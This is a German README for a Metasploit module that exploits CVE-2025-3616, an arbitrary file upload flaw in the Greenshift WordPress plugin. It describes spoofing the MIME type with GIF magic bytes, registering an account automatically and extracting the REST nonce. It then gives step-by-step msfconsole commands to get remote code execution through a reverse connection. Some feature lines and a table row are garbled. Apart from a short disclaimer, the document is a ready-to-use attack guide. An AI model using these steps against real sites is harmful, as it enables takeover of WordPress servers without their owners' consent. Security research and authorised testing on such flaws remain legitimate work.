
Metasploit-Modul, das beliebigen Datei-Upload im Greenshift WordPress-Plugin (CVE-2025-3616) ausnutzt, um RCE über MIME-Spoofing zu erreichen, mit automatischer Registrierung und Nonce-Extraktion.
Dieses Repository enthält ein Metasploit-Modul zur Ausnutzung von CVE-2025-3616, einer Schwachstelle für beliebiges Datei-Upload im Greenshift WordPress Plugin (Versionen 11.4 bis 11.4.5).
Der Exploit ermöglicht authentifizierten Benutzern (Subscriber+) das Hochladen beliebiger Dateien, was zu Remote Code Execution (RCE) führt. Er umgeht die Dateityp-Validierung des Plugins, indem er den MIME-Typ mittels GIF-Magic-Bytes (GIF89a;) fälscht.
USERNAME/PASSWORD).REGISTER-Option, um automatisch einen neuen Benutzer zu registrieren und die Schwachstelle mit den frischen Session-Cookies auszunutzen (nützlich, wenn die Registrierung auf dem Ziel aktiviert ist).wp_rest-Nonce aus dem administrativen Dashboard.finfo_file()-Überprüfung zu umgehen.Stellen Sie sicher, dass das Metasploit-Framework installiert ist.
Kopieren Sie wp_greenshift_file_upload.rb in Ihr lokales Module-Verzeichnis:
mkdir -p ~/.msf4/modules/exploits/unix/webapp/
cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
Starten Sie msfconsole und laden Sie die Module neu:
msfconsole
msf6 > reload_all
Wenn die Benutzerregistrierung auf dem Ziel aktiviert ist, benötigen Sie keine Anmeldedaten.
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run
Wenn Sie bereits einen gültigen Benutzer (Subscriber oder höher) haben:
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run
| Option | Erforderlich | Beschreibung |
|---|---|---|
| RHOSTS | ja | Die Zieladresse |
| LHOST | ja | Die Lauschadresse (Ihre IP) |
| REGISTER | nein | Auf true setzen, um automatisch ein neues Konto zu registrieren (Standard: false) |
| USERNAME | nein | WordPress-Benutzername (erforderlich, wenn REGISTER false ist) |
| PASSWORD | nein | WordPress-Passwort (erforderlich, wenn REGISTER false ist) |
| nein | E-Mail für die Registrierung (optional, wird bei Leerheit automatisch generiert) |
Dieses Modul dient nur zu Bildungszwecken und autorisierten Penetrationstests. Die Verwendung dieses Codes zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal.